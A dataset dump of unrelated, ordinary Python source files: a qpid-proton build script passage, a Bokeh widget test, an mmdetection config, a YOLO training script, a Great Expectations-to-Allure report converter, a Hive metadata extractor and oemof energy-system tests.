subprocess.Popen([sys.executable,
os.path.join(proton_src, 'codec', 'encodings.h.py')],
env=proton_envs, stdout=header)
# Create a custom, temporary, version.h file mapping the
# major and minor versions from the downloaded tarball. This version should
# match the ones in the bundle module
with open(os.path.join(build_include, 'proton', 'version.h'), "wb") as ver:
version_text = """
#ifndef _PROTON_VERSION_H
#define _PROTON_VERSION_H 1
#define PN_VERSION_MAJOR %i
#define PN_VERSION_MINOR %i
#define PN_VERSION_POINT %i
#endif /* version.h */
""" % bundle.bundled_version
ver.write(version_text.encode('utf-8'))
# Collect all the Proton C files that need to be built.
# we could've used `glob(.., '*', '*.c')` but I preferred going
# with an explicit list of subdirs that we can control and expand
# depending on the version. Specifically, lets avoid adding things
# we don't need.
sources = []
for subdir in ['object', 'framing', 'codec', 'dispatcher',
'engine', 'events', 'transport',
'message', 'reactor', 'messenger',
'handlers', 'posix']:
sources.extend(glob.glob(os.path.join(proton_src, subdir, '*.c')))
sources.extend(filter(lambda x: not x.endswith('dump.c'),
glob.iglob(os.path.join(proton_src, '*.c'))))
# Look for any optional libraries that proton needs, and adjust the
# source list and compile flags as necessary.
libraries = []
# -D flags (None means no value, just define)
macros=[('qpid_proton_EXPORTS', None),
('USE_ATOLL', None),
('USE_STRERROR_R', None)]
# Check whether openssl is installed by poking
# pkg-config for a minimum version 0. If it's installed, it should
# return True and we'll use it. Otherwise, we'll use the stub.
if misc.pkg_config_version(atleast='0', module='openssl'):
libraries += ['ssl', 'crypto']
sources.append(os.path.join(proton_src, 'ssl', 'openssl.c'))
else:
sources.append(os.path.join(proton_src, 'ssl', 'ssl_stub.c'))
# create a temp compiler to check for optional compile-time features
cc = new_compiler(compiler=self.compiler_type)
cc.output_dir = self.build_temp
# Some systems need to link to `rt`. Check whether `clock_gettime` is
# around and if librt is needed
if cc.has_function('clock_gettime'):
macros.append(('USE_CLOCK_GETTIME', None))
else:
if cc.has_function('clock_gettime', libraries=['rt']):
libraries.append('rt')
macros.append(('USE_CLOCK_GETTIME', None))
# 0.10 added an implementation for cyrus. Check
# if it is available before adding the implementation to the sources
# list. Eventually, `sasl.c` will be added and one of the existing
# implementations will be used.
if cc.has_function('sasl_client_done', includes=['sasl/sasl.h'],
libraries=['sasl2']):
libraries.append('sasl2')
sources.append(os.path.join(proton_src, 'sasl', 'cyrus_sasl.c'))
else:
sources.append(os.path.join(proton_src, 'sasl', 'none_sasl.c'))
sources.append(os.path.join(proton_src, 'sasl', 'sasl.c'))
# compile all the proton sources. We'll add the resulting list of
# objects to the _cproton extension as 'extra objects'. We do this
# instead of just lumping all the sources into the extension to prevent
# any proton-specific compilation flags from affecting the compilation
# of the generated swig code
cc = new_compiler(compiler=self.compiler_type)
ds_sys.customize_compiler(cc)
objects = cc.compile(sources,
macros=macros,
include_dirs=[build_include,
proton_include,
proton_src],
# compiler command line options:
extra_postargs=['-std=gnu99'],
output_dir=self.build_temp)
#
# Now update the _cproton extension instance to include the objects and
# libraries
#
_cproton = self.distribution.ext_modules[-1]
_cproton.extra_objects = objects
_cproton.include_dirs.append(build_include)
_cproton.include_dirs.append(proton_include)
# swig will need to access the proton headers:
_cproton.swig_opts.append('-I%s' % build_include)
_cproton.swig_opts.append('-I%s' % proton_include)
# lastly replace the libqpid-proton dependency with libraries required
# by the Proton objects:
_cproton.libraries=libraries
def check_qpid_proton_version(self):
"""check the qpid_proton version"""
target_version = bundle.bundled_version_str
return (misc.pkg_config_version(max_version=target_version) and
misc.pkg_config_version(atleast=bundle.min_qpid_proton_str))
@property
def bundle_proton(self):
"""Need to bundle proton if the conditions below are met."""
return ('QPID_PROTON_SRC' in os.environ) or \
(not self.check_qpid_proton_version())
def use_installed_proton(self):
"""The Proton development headers and library are installed, update the
_cproton extension to tell it where to find the library and headers.
"""
_cproton = self.distribution.ext_modules[-1]
incs = misc.pkg_config_get_var('includedir')
for i in incs.split():
_cproton.swig_opts.append('-I%s' % i)
_cproton.include_dirs.append(i)
ldirs = misc.pkg_config_get_var('libdir')
_cproton.library_dirs.extend(ldirs.split())
def run(self):
# check if the Proton library and headers are installed and are
# compatible with this version of the binding.
if self.bundle_proton:
# Proton not installed or compatible
self.bundle_libqpid_proton_extension()
else:
self.use_installed_proton()
self.prepare_swig_wrap()
class CustomBuildOrder(build):
# The sole purpose of this class is to re-order
# the commands execution so that `build_ext` is executed *before*
# build_py. We need this to make sure `cproton.py` is generated
# before the python modules are collected. Otherwise, it won't
# be installed.
sub_commands = [
('build_ext', build.has_ext_modules),
('build_py', build.has_pure_modules),
('build_clib', build.has_c_libraries),
('build_scripts', build.has_scripts),
]
class CheckingBuildExt(build_ext):
"""Subclass build_ext to build qpid-proton using `cmake`"""
def run(self):
# Discover qpid-proton in the system
self.distribution.run_command('configure')
build_ext.run(self)
# Override `build_ext` and add `configure`
cmdclass = {'configure': Configure,
'build': CustomBuildOrder,
'build_ext': CheckingBuildExt,
'sdist': CheckSDist}
setup(name='python-qpid-proton',
version=bundle.bundled_version_str,
description='An AMQP based messaging library.',
author='Apache Qpid',
author_email='[email protected]',
url='http://qpid.apache.org/proton/',
packages=['proton'],
py_modules=['cproton'],
license="Apache Software License",
classifiers=["License :: OSI Approved :: Apache Software License",
"Intended Audience :: Developers",
"Programming Language :: Python",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 2.6",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.3",
"Programming Language :: Python :: 3.4",
"Programming Language :: Python :: 3.5"],
cmdclass=cmdclass,
# Note well: the following extension instance is modified during the
# installation! If you make changes below, you may need to update the
# Configure class above
ext_modules=[Extension('_cproton',
sources=['cproton.i', 'cproton_wrap.c'],
swig_opts=['-threads'],
extra_compile_args=['-pthread'],
libraries=['qpid-proton'])])
|
the-stack_0_25967
|
#-----------------------------------------------------------------------------
# Copyright (c) 2012 - 2017, Anaconda, Inc. All rights reserved.
#
# Powered by the Bokeh Development Team.
#
# The full license is in the file LICENSE.txt, distributed with this software.
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Boilerplate
#-----------------------------------------------------------------------------
import pytest ; pytest
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
# Bokeh imports
from bokeh._testing.util.selenium import RECORD
from bokeh.layouts import column
from bokeh.models import (
CheckboxButtonGroup,
Circle,
ColumnDataSource,
CustomAction,
CustomJS,
Plot,
Range1d,
)
#-----------------------------------------------------------------------------
# Tests
#-----------------------------------------------------------------------------
pytest_plugins = (
"bokeh._testing.plugins.project",
)
LABELS = ["Option 1", "Option 2", "Option 3"]
@pytest.mark.integration
@pytest.mark.selenium
class Test_CheckboxButtonGroup(object):
def test_server_on_change_round_trip(self, bokeh_server_page):
def modify_doc(doc):
source = ColumnDataSource(dict(x=[1, 2], y=[1, 1], val=["a", "b"]))
plot = Plot(plot_height=400, plot_width=400, x_range=Range1d(0, 1), y_range=Range1d(0, 1), min_border=0)
plot.add_glyph(source, Circle(x='x', y='y', size=20))
plot.add_tools(CustomAction(callback=CustomJS(args=dict(s=source), code=RECORD("data", "s.data"))))
group = CheckboxButtonGroup(labels=LABELS, css_classes=["foo"])
def cb(active):
source.data['val'] = (active + [0, 0])[:2] # keep col length at 2, padded with zero
group.on_click(cb)
doc.add_root(column(group, plot))
page = bokeh_server_page(modify_doc)
el = page.driver.find_element_by_css_selector('.foo .bk-btn:nth-child(3)')
el.click()
page.click_custom_action()
results = page.results
assert results['data']['val'] == [2, 0]
el = page.driver.find_element_by_css_selector('.foo .bk-btn:nth-child(1)')
el.click()
page.click_custom_action()
results = page.results
assert results['data']['val'] == [0, 2]
# XXX (bev) disabled until https://github.com/bokeh/bokeh/issues/7970 is resolved
#assert page.has_no_console_errors()
def test_js_on_change_executes(self, bokeh_model_page):
group = CheckboxButtonGroup(labels=LABELS, css_classes=["foo"])
group.js_on_click(CustomJS(code=RECORD("active", "cb_obj.active")))
page = bokeh_model_page(group)
el = page.driver.find_element_by_css_selector('.foo .bk-btn:nth-child(3)')
el.click()
results = page.results
assert results['active'] == [2]
el = page.driver.find_element_by_css_selector('.foo .bk-btn:nth-child(1)')
el.click()
results = page.results
assert results['active'] == [0, 2]
el = page.driver.find_element_by_css_selector('.foo .bk-btn:nth-child(3)')
el.click()
results = page.results
assert results['active'] == [0]
assert page.has_no_console_errors()
|
the-stack_0_25969
|
# model settings
model = dict(
type='RPN',
pretrained='open-mmlab://resnet50_caffe',
backbone=dict(
type='ResNet',
depth=50,
num_stages=4,
out_indices=(0, 1, 2, 3),
frozen_stages=1,
norm_cfg=dict(type='BN', requires_grad=False),
norm_eval=True,
style='caffe'),
neck=dict(
type='FPN',
in_channels=[256, 512, 1024, 2048],
out_channels=256,
num_outs=5),
rpn_head=dict(
type='GARPNHead',
in_channels=256,
feat_channels=256,
octave_base_scale=8,
scales_per_octave=3,
octave_ratios=[0.5, 1.0, 2.0],
anchor_strides=[4, 8, 16, 32, 64],
anchor_base_sizes=None,
anchoring_means=[.0, .0, .0, .0],
anchoring_stds=[0.07, 0.07, 0.14, 0.14],
target_means=(.0, .0, .0, .0),
target_stds=[0.07, 0.07, 0.11, 0.11],
loc_filter_thr=0.01,
loss_loc=dict(
type='FocalLoss',
use_sigmoid=True,
gamma=2.0,
alpha=0.25,
loss_weight=1.0),
loss_shape=dict(type='BoundedIoULoss', beta=0.2, loss_weight=1.0),
loss_cls=dict(
type='CrossEntropyLoss', use_sigmoid=True, loss_weight=1.0),
loss_bbox=dict(type='SmoothL1Loss', beta=1.0, loss_weight=1.0)))
# model training and testing settings
train_cfg = dict(
rpn=dict(
ga_assigner=dict(
type='ApproxMaxIoUAssigner',
pos_iou_thr=0.7,
neg_iou_thr=0.3,
min_pos_iou=0.3,
ignore_iof_thr=-1),
ga_sampler=dict(
type='RandomSampler',
num=256,
pos_fraction=0.5,
neg_pos_ub=-1,
add_gt_as_proposals=False),
assigner=dict(
type='MaxIoUAssigner',
pos_iou_thr=0.7,
neg_iou_thr=0.3,
min_pos_iou=0.3,
ignore_iof_thr=-1),
sampler=dict(
type='RandomSampler',
num=256,
pos_fraction=0.5,
neg_pos_ub=-1,
add_gt_as_proposals=False),
allowed_border=-1,
pos_weight=-1,
center_ratio=0.2,
ignore_ratio=0.5,
debug=False))
test_cfg = dict(
rpn=dict(
nms_across_levels=False,
nms_pre=2000,
nms_post=2000,
max_num=2000,
nms_thr=0.7,
min_bbox_size=0))
# dataset settings
dataset_type = 'CocoDataset'
data_root = 'data/coco/'
img_norm_cfg = dict(
mean=[102.9801, 115.9465, 122.7717], std=[1.0, 1.0, 1.0], to_rgb=False)
train_pipeline = [
dict(type='LoadImageFromFile'),
dict(type='LoadAnnotations', with_bbox=True, with_label=False),
dict(type='Resize', img_scale=(1333, 800), keep_ratio=True),
dict(type='RandomFlip', flip_ratio=0.5),
dict(type='Normalize', **img_norm_cfg),
dict(type='Pad', size_divisor=32),
dict(type='DefaultFormatBundle'),
dict(type='Collect', keys=['img', 'gt_bboxes']),
]
test_pipeline = [
dict(type='LoadImageFromFile'),
dict(
type='MultiScaleFlipAug',
img_scale=(1333, 800),
flip=False,
transforms=[
dict(type='Resize', keep_ratio=True),
dict(type='RandomFlip'),
dict(type='Normalize', **img_norm_cfg),
dict(type='Pad', size_divisor=32),
dict(type='ImageToTensor', keys=['img']),
dict(type='Collect', keys=['img']),
])
]
data = dict(
imgs_per_gpu=2,
workers_per_gpu=2,
train=dict(
type=dataset_type,
ann_file=data_root + 'annotations/instances_train2017.json',
img_prefix=data_root + 'train2017/',
pipeline=train_pipeline),
val=dict(
type=dataset_type,
ann_file=data_root + 'annotations/instances_val2017.json',
img_prefix=data_root + 'val2017/',
pipeline=test_pipeline),
test=dict(
type=dataset_type,
ann_file=data_root + 'annotations/instances_val2017.json',
img_prefix=data_root + 'val2017/',
pipeline=test_pipeline))
evaluation = dict(interval=1, metric='proposal_fast')
# optimizer
optimizer = dict(type='SGD', lr=0.02, momentum=0.9, weight_decay=0.0001)
# runner configs
optimizer_config = dict(grad_clip=dict(max_norm=35, norm_type=2))
lr_config = dict(
policy='step',
warmup='linear',
warmup_iters=500,
warmup_ratio=1.0 / 3,
step=[8, 11])
checkpoint_config = dict(interval=20)
# yapf:disable
log_config = dict(
interval=50,
hooks=[
dict(type='TextLoggerHook'),
# dict(type='TensorboardLoggerHook')
])
# yapf:enable
# runtime settings
total_epochs = 300
dist_params = dict(backend='nccl')
log_level = 'INFO'
work_dir = './work_dirs/ga_rpn_r50_caffe_fpn_1x'
load_from = None
resume_from = None
workflow = [('train', 1)]
|
the-stack_0_25970
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""The setup script."""
from setuptools import setup, find_packages
with open('README.rst') as readme_file:
readme = readme_file.read()
requirements = []
setup_requirements = ['pytest-runner', ]
test_requirements = ['pytest', ]
setup(
author="Julien Duponchelle",
author_email='[email protected]',
classifiers=[
'Development Status :: 2 - Pre-Alpha',
'Intended Audience :: Developers',
'License :: OSI Approved :: Apache Software License',
'Natural Language :: English',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
],
description="JSON API to document parser",
install_requires=requirements,
license="Apache Software License 2.0",
long_description=readme,
include_package_data=True,
keywords='json api',
name='json-api-doc',
packages=find_packages(include=['json_api_doc']),
setup_requires=setup_requirements,
test_suite='tests',
tests_require=test_requirements,
url='https://github.com/noplay/json-api-doc',
version='0.9.0',
entry_points={
'console_scripts': ['jsonapidoc = json_api_doc.__main__:main'],
}
)
|
the-stack_0_25972
|
import os
import torch
import datetime
from darknet import Darknet19
from datasets.pascal_voc import VOCDataset
import utils.yolo as yolo_utils
import utils.network as net_utils
from utils.timer import Timer
import cfgs.config as cfg
from random import randint
try:
from pycrayon import CrayonClient
except ImportError:
CrayonClient = None
# data loader
imdb = VOCDataset(cfg.imdb_train, cfg.DATA_DIR, cfg.train_batch_size,
yolo_utils.preprocess_train, processes=2, shuffle=True,
dst_size=cfg.multi_scale_inp_size)
# dst_size=cfg.inp_size)
print('load data succ...')
net = Darknet19()
# net_utils.load_net(cfg.trained_model, net)
# pretrained_model = os.path.join(cfg.train_output_dir,
# 'darknet19_voc07trainval_exp1_63.h5')
# pretrained_model = cfg.trained_model
# net_utils.load_net(pretrained_model, net)
net.load_from_npz(cfg.pretrained_model, num_conv=18)
net.cuda()
net.train()
print('load net succ...')
# optimizer
start_epoch = 0
lr = cfg.init_learning_rate
optimizer = torch.optim.SGD(net.parameters(), lr=lr, momentum=cfg.momentum,
weight_decay=cfg.weight_decay)
# tensorboad
use_tensorboard = cfg.use_tensorboard and CrayonClient is not None
# use_tensorboard = False
remove_all_log = False
if use_tensorboard:
cc = CrayonClient(hostname='127.0.0.1')
if remove_all_log:
print('remove all experiments')
cc.remove_all_experiments()
if start_epoch == 0:
try:
cc.remove_experiment(cfg.exp_name)
except ValueError:
pass
exp = cc.create_experiment(cfg.exp_name)
else:
exp = cc.open_experiment(cfg.exp_name)
batch_per_epoch = imdb.batch_per_epoch
train_loss = 0
bbox_loss, iou_loss, cls_loss = 0., 0., 0.
cnt = 0
t = Timer()
step_cnt = 0
size_index = 0
for step in range(start_epoch * imdb.batch_per_epoch,
cfg.max_epoch * imdb.batch_per_epoch):
t.tic()
# batch
batch = imdb.next_batch(size_index)
im = batch['images']
gt_boxes = batch['gt_boxes']
gt_classes = batch['gt_classes']
dontcare = batch['dontcare']
orgin_im = batch['origin_im']
# forward
im_data = net_utils.np_to_variable(im,
is_cuda=True,
volatile=False).permute(0, 3, 1, 2)
net(im_data, gt_boxes, gt_classes, dontcare, size_index)
# backward
loss = net.loss
bbox_loss += net.bbox_loss.data.cpu().numpy()[0]
iou_loss += net.iou_loss.data.cpu().numpy()[0]
cls_loss += net.cls_loss.data.cpu().numpy()[0]
train_loss += loss.data.cpu().numpy()[0]
optimizer.zero_grad()
loss.backward()
optimizer.step()
cnt += 1
step_cnt += 1
duration = t.toc()
if step % cfg.disp_interval == 0:
train_loss /= cnt
bbox_loss /= cnt
iou_loss /= cnt
cls_loss /= cnt
print(('epoch %d[%d/%d], loss: %.3f, bbox_loss: %.3f, iou_loss: %.3f, '
'cls_loss: %.3f (%.2f s/batch, rest:%s)' %
(imdb.epoch, step_cnt, batch_per_epoch, train_loss, bbox_loss,
iou_loss, cls_loss, duration,
str(datetime.timedelta(seconds=int((batch_per_epoch - step_cnt) * duration)))))) # noqa
if use_tensorboard and step % cfg.log_interval == 0:
exp.add_scalar_value('loss_train', train_loss, step=step)
exp.add_scalar_value('loss_bbox', bbox_loss, step=step)
exp.add_scalar_value('loss_iou', iou_loss, step=step)
exp.add_scalar_value('loss_cls', cls_loss, step=step)
exp.add_scalar_value('learning_rate', lr, step=step)
train_loss = 0
bbox_loss, iou_loss, cls_loss = 0., 0., 0.
cnt = 0
t.clear()
size_index = randint(0, len(cfg.multi_scale_inp_size) - 1)
print("image_size {}".format(cfg.multi_scale_inp_size[size_index]))
if step > 0 and (step % imdb.batch_per_epoch == 0):
if imdb.epoch in cfg.lr_decay_epochs:
lr *= cfg.lr_decay
optimizer = torch.optim.SGD(net.parameters(), lr=lr,
momentum=cfg.momentum,
weight_decay=cfg.weight_decay)
save_name = os.path.join(cfg.train_output_dir,
'{}_{}.h5'.format(cfg.exp_name, imdb.epoch))
net_utils.save_net(save_name, net)
print(('save model: {}'.format(save_name)))
step_cnt = 0
imdb.close()
|
the-stack_0_25973
|
#!/usr/bin/python
import sys
import select
JS_EVENT_BUTTON = 0x01
JS_EVENT_AXIS = 0x02
JS_EVENT_INIT = 0x08
axes = []
buttons = []
def init():
global axes, buttons
packet = sys.stdin.readline().split()
axes = [0.] * int(packet[0])
buttons = [False] * int(packet[1])
def get(): # ignora JS_EVENT_INIT
global axes, buttons
modificados = [[], []]
while select.select([sys.stdin], [], [], 0.)[0]:
packet = sys.stdin.readline().split()
packet[0], packet[1] = int(packet[0]), int(packet[1])
if bool(packet[0] & JS_EVENT_BUTTON):
buttons[packet[1]] = True if packet[2] == '1' else False
modificados[1].append(packet[1])
else:
axes[packet[1]] = float(packet[2])
modificados[0].append(packet[1])
return modificados
if __name__ == "__main__":
init()
while True:
if select.select([sys.stdin], [], [], 0.)[0]:
print(get())
print(axes, buttons)
|
the-stack_0_25977
|
import json
import os
import sys
from datetime import datetime
import glob
import great_expectations as ge
from great_expectations.expectations.expectation import (
ExpectationConfiguration,
)
from great_expectations.expectations.registry import (
get_expectation_impl)
import shutil
def initialize_config():
with open("config.json", "r") as jsonfile:
data = json.load(jsonfile)
root_ge_dir = data['root_folder_ge']
allure_result_dir = data['allure_result']
allure_report_dir = data['allure_report']
if sys.argv[1:] is not str:
test_suite = data['default_suite']
else:
test_suite = sys.argv[1:]
return root_ge_dir, allure_result_dir, allure_report_dir, test_suite
def get_test_human_name(file):
exp = get_expectation_impl(get_test_name(file))
template_json = exp._prescriptive_renderer(
configuration=ExpectationConfiguration(get_test_name(file),
kwargs=get_params1(file)))[0]
if type(template_json) is not dict:
template_json = template_json.to_json_dict()
template_str = template_json['string_template']['template']
params = get_params1(file)
result_string = template_str
new_params = {}
for key, value in params.items():
if type(value) == list:
if key == 'value_set':
for i in value:
new_params["v__" + str(value.index(i))] = i
else:
for i in value:
new_params[str(key) + "_" + str(value.index(i))] = i
if new_params:
if 'value_set' in params.keys():
del params['value_set']
params.update(new_params)
else:
params = new_params
for key, value in params.items():
result_string = result_string.replace('$%s' % key, str(value))
return result_string
def get_json(ge_root_dir, test_suite):
file = glob.glob(
os.path.join(os.path.abspath(ge_root_dir),
'great_expectations/uncommitted/validations/' + test_suite
+ '/**/**/*.json'), recursive=False)
with open(file[0]) as jsonfile:
return json.load(jsonfile)
def get_test_name(file):
return file['expectation_config']['expectation_type']
def get_suit_name(file, i):
return file['meta']['active_batch_definition']['data_asset_name'] + "." + i['expectation_config']['kwargs'][
'column'] if 'column' in i['expectation_config']['kwargs'] else file['meta']['active_batch_definition']['data_asset_name']
def get_jira_ticket(file):
if 'Bug Ticket' in file['expectation_config']['meta']:
return {
"name": "Bug ticket",
"url": file['expectation_config']['meta']['Bug Ticket'],
"type": "issue"
}
else:
return {}
def get_severity(file):
return file['expectation_config']['meta']['Severity'] if 'Severity' in file['expectation_config']['meta'] else ""
def get_start_suit_time(file):
return parse_datetime(file['meta']['batch_markers']['ge_load_time'])
def get_stop_suit_time():
return datetime.now().timestamp()
def parse_datetime(date_str):
return datetime.timestamp(datetime.strptime(date_str, '%Y%m%dT%H%M%S.%fZ'))*1000
def parse_datetime_run_name(date_str):
date_str = date_str.replace("+00:00","Z")
return datetime.timestamp(datetime.strptime(date_str, '%Y-%m-%dT%H:%M:%S.%fZ'))*1000
def get_start_test_time(file):
return parse_datetime_run_name(file['meta']['run_id']['run_time'])
def get_stop_test_time(file):
return parse_datetime(file['meta']['validation_time'])
def get_params(file):
params = file['expectation_config']['kwargs']
result = []
for param in params:
result.append({"name": param, "value": str(params[param])}) if isinstance(params[param],
list) else result.append(
{"name": param, "value": params[param]})
return result
def get_params1(file):
params = file['expectation_config']['kwargs']
return params
def get_test_status(file):
return "passed" if file['success'] is True else "failed"
def get_test_description(file):
result = ""
for f in file['result']:
if str(f) != 'observed_value':
result = str(f) + ": " + str(file['result'][f]) + "\n"
return result
def get_observed_value(file):
return "Observed value: " + str(file['result']['observed_value']) if 'observed_value' in file[
'result'] else "Unexcpected count: " + str(file['result']['unexpected_count'])
def get_exception_message(file):
return file['exception_info']['exception_message']
def get_exception_traceback(file):
return file['exception_info']['exception_traceback']
def create_categories_json(allure_result):
data = [
{
"name": "Ignored tests",
"matchedStatuses": [
"skipped"
]
},
{
"name": "Passed tests",
"matchedStatuses": [
"passed"
]
},
{
"name": "Broken tests",
"matchedStatuses": [
"broken"
]
},
{
"name": "Failed tests",
"matchedStatuses": [
"failed"
]
}
]
result = json.dumps(data)
with open(allure_result + "/categories.json", "w") as file:
file.write(result)
def get_uuid(i, allure_report):
fl = ""
if os.path.exists(allure_report + '/history'):
with open(allure_report + '/history/history.json') as jsonfile:
fl = json.load(jsonfile)
keys = list(fl.keys())
keys.sort()
return keys[i]
else:
return datetime.now().strftime("%S%f")
def create_suit_json(allure_result, allure_report, ge_root_dir, test_suite):
if os.path.exists(allure_result):
shutil.rmtree(allure_result + '/')
os.makedirs(allure_result)
file = get_json(ge_root_dir, test_suite)
start_time = get_start_suit_time(file)
stop_time = get_stop_test_time(file)
for i in file['results']:
uuid = str(get_uuid(list(file['results']).index(i), allure_report))
data = {
"uuid": uuid,
"historyId": uuid,
"status": get_test_status(i),
"parameters": get_params(i),
"labels": [{
"name": "test",
"value": get_test_name(i)
}, {
"name": "suite",
"value": get_suit_name(file, i)
},
{
"name": "severity",
"value": get_severity(i)
}
],
"links": [get_jira_ticket(i)],
"name": get_test_name(i),
"description": get_test_description(i),
"statusDetails": {"known": False, "muted": False, "flaky": False,
"message": get_observed_value(i) if get_test_status(i) == 'failed' else "",
"trace": get_exception_traceback(i)},
"start": start_time,
"stop": stop_time,
"steps": [
{
"status": get_test_status(i),
"name": get_test_human_name(i),
"start": get_start_test_time(file),
"stop": get_stop_test_time(file)
}]
}
result = json.dumps(data)
with open(allure_result + '/' + uuid + "-result.json", "w") as fl:
fl.write(result)
def transfer_folder(root_src_dir, root_dst_dir):
for src_dir, dirs, files in os.walk(root_src_dir):
dst_dir = src_dir.replace(root_src_dir, root_dst_dir, 1)
if not os.path.exists(dst_dir):
os.makedirs(dst_dir)
for file_ in files:
src_file = os.path.join(src_dir, file_)
dst_file = os.path.join(dst_dir, file_)
if os.path.exists(dst_file):
# in case of the src and dst are the same file
if os.path.samefile(src_file, dst_file):
continue
os.remove(dst_file)
shutil.copy(src_file, dst_dir)
def transfer_history(allure_result, allure_report):
if os.path.isdir(allure_report):
transfer_folder(allure_report + '/history', allure_result + '/history')
def create_json_report(root_ge_dir="", allure_result_dir="", allure_report_dir="", test_suite=""):
root_ge_dir_config, allure_result_dir_config, allure_report_dir_config, test_suite_config = initialize_config()
root_ge_dir = root_ge_dir_config if len(root_ge_dir) == 0 else root_ge_dir
allure_result_dir = allure_result_dir_config if len(allure_result_dir) == 0 else allure_result_dir
allure_report_dir = allure_report_dir_config if len(allure_report_dir) == 0 else allure_report_dir
test_suite = test_suite_config if len(test_suite) == 0 else test_suite
create_suit_json(allure_result_dir, allure_report_dir, root_ge_dir, test_suite)
create_categories_json(allure_result_dir)
transfer_history(allure_result_dir, allure_report_dir)
if __name__ == '__main__':
create_json_report()
|
the-stack_0_25978
|
#!/usr/bin/python
#
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import pandas as pd
from pyhive import hive
def __get_hive_conn(host, username, port=10000, schema='default'):
return hive.connect(host=host,
port=port,
username=username,
database=schema,
auth=None)
def __extract(csv_file_name):
con = __get_hive_conn('localhost', 'hive')
cur = con.cursor()
query = """ SELECT
d."DB_ID" DATABASE_ID, d."NAME" DATABASE_NAME, d."DESC" DATABASE_DESC,
d."DB_LOCATION_URI" DATABASE_URI,
t."TBL_ID" TABLE_ID, t."TBL_NAME" TABLE_NAME, t."TBL_TYPE" TABLE_TYPE,
t."CREATE_TIME" TABLE_CREATE_TIME, t."LAST_ACCESS_TIME" TABLE_LAST_ACCESS_TIME,
s."LOCATION" TABLE_URI,
c."COLUMN_NAME" COLUMN_NAME, c."TYPE_NAME" COLUMN_TYPE, c."COMMENT" COLUMN_DESC,
c."INTEGER_IDX" COLUMN_INDEX
FROM "DBS" d
LEFT JOIN "TBLS" t on t."DB_ID" = d."DB_ID"
LEFT JOIN "SDS" s on s."SD_ID" = t."SD_ID"
LEFT JOIN "COLUMNS_V2" c on s."CD_ID" = c."CD_ID";
"""
# Execute query
cur.execute(query)
# Put it all to a data frame
sql_data = pd.DataFrame(cur.fetchall())
sql_data.columns = [item[0] for item in cur.description]
# Close the session
con.close()
# Show the data
logging.info(sql_data.head())
sql_data.to_csv(csv_file_name, sep=',', encoding='utf-8')
if __name__ == '__main__':
# Enable logging
logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
__extract('hive_full_dump.csv')
|
the-stack_0_25979
|
# -*- coding: utf-8 -
"""Basic tests.
This file is part of project oemof (github.com/oemof/oemof). It's copyrighted
by the contributors recorded in the version control history of the file,
available from its original location oemof/tests/basic_tests.py
SPDX-License-Identifier: MIT
"""
try:
from collections.abc import Iterable
except ImportError:
from collections import Iterable
from pprint import pformat
from nose.tools import ok_, eq_
import pandas as pd
from oemof import energy_system as es
from oemof.network import Entity
from oemof.network import Bus, Transformer
from oemof.network import Bus as NewBus, Node, temporarily_modifies_registry
from oemof.groupings import Grouping, Nodes, Flows, FlowsWithNodes as FWNs
class TestsEnergySystem:
@classmethod
def setUpClass(cls):
cls.timeindex = pd.date_range('1/1/2012', periods=5, freq='H')
def setup(self):
self.es = es.EnergySystem()
Node.registry = self.es
def test_entity_registration(self):
bus = Bus(label='bus-uid', type='bus-type')
eq_(self.es.nodes[0], bus)
bus2 = Bus(label='bus-uid2', type='bus-type')
eq_(self.es.nodes[1], bus2)
t1 = Transformer(label='pp_gas', inputs=[bus], outputs=[bus2])
ok_(t1 in self.es.nodes)
self.es.timeindex = self.timeindex
ok_(len(self.es.timeindex) == 5)
def test_entity_grouping_on_construction(self):
bus = Bus(label="test bus")
ensys = es.EnergySystem(entities=[bus])
ok_(ensys.groups[bus.label] is bus)
def test_that_nodes_is_a_proper_alias_for_entities(self):
b1, b2 = Bus(label="B1"), Bus(label="B2")
eq_(self.es.nodes, [b1, b2])
empty = []
self.es.nodes = empty
ok_(self.es.entities is empty)
def test_that_none_is_not_a_valid_group(self):
def by_uid(n):
if "Not in 'Group'" in n.uid:
return None
else:
return "Group"
ensys = es.EnergySystem(groupings=[by_uid])
ungrouped = [Entity(uid="Not in 'Group': {}".format(i))
for i in range(10)]
grouped = [Entity(uid="In 'Group': {}".format(i))
for i in range(10)]
ok_(None not in ensys.groups)
for g in ensys.groups.values():
for e in ungrouped:
if isinstance(g, Iterable) and not isinstance(g, str):
ok_(e not in g)
for e in grouped:
if isinstance(g, Iterable) and not isinstance(g, str):
ok_(e in g)
@temporarily_modifies_registry
def test_defining_multiple_groupings_with_one_function(self):
def assign_to_multiple_groups_in_one_go(n):
g1 = n.label[-1]
g2 = n.label[0:3]
return [g1, g2]
ensy = es.EnergySystem(groupings=[assign_to_multiple_groups_in_one_go])
Node.registry = ensy
[Node(label=("Foo: " if i % 2 == 0 else "Bar: ") +
"{}".format(i) + ("A" if i < 5 else "B")) for i in
range(10)]
for group in ["Foo", "Bar", "A", "B"]:
eq_(len(ensy.groups[group]), 5,
("\n Failed testing length of group '{}'." +
"\n Expected: 5" +
"\n Got : {}" +
"\n Group : {}").format(
group, len(ensy.groups[group]),
sorted([e.label for e in ensy.groups[group]])))
def test_grouping_filter_parameter(self):
g1 = Grouping(key=lambda e: "The Special One",
filter=lambda e: "special" in str(e))
g2 = Nodes(key=lambda e: "A Subset",
filter=lambda e: "subset" in str(e))
ensys = es.EnergySystem(groupings=[g1, g2])
special = Node(label="special")
subset = set(Node(label="subset: {}".format(i)) for i in range(10))
others = set(Node(label="other: {}".format(i)) for i in range(10))
ensys.add(special, *subset)
ensys.add(*others)
eq_(ensys.groups["The Special One"], special)
eq_(ensys.groups["A Subset"], subset)
